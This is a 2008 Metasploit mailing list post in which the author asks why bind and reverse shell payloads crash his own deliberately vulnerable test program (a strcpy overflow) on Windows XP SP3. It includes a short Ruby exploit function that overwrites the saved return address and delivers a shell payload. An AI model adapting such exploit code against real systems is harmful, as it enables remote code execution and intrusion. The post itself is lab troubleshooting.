Metasploit mailing list archives

MSF and Windows SP3


From: security at vahle.de (Thomas Werth)
Date: Mon, 02 Jun 2008 09:30:29 +0200

Dear List,

i've been playing around with xp sp3. I've used a small sample programm 
having a buffer overflow (strcpy into 256 sized buffer).

Now when using exploits (bind_shell, reverse_shell) program is abnormal 
terminated.
In Bindshell example the shell is created and listens on target. But 
when connection occurs program crashes, same for reverse shell ...

This is demo exploit function, Payload Space is set to 260 so target 
adress will overwrite bytes from 261-264 and will set new saved_eip

def exploit
                 connect

                 sploit =  payload.encoded + [target.ret].pack('V')

                 print_status("Trying target #{target.name}...")
                 print_status (sploit)
                 print_status (sploit.size)
                 sock.put(sploit)

                 handler
                 disconnect
         end

Anyone having same problems with xpsp3 ?

greetings
Thomas



Current thread: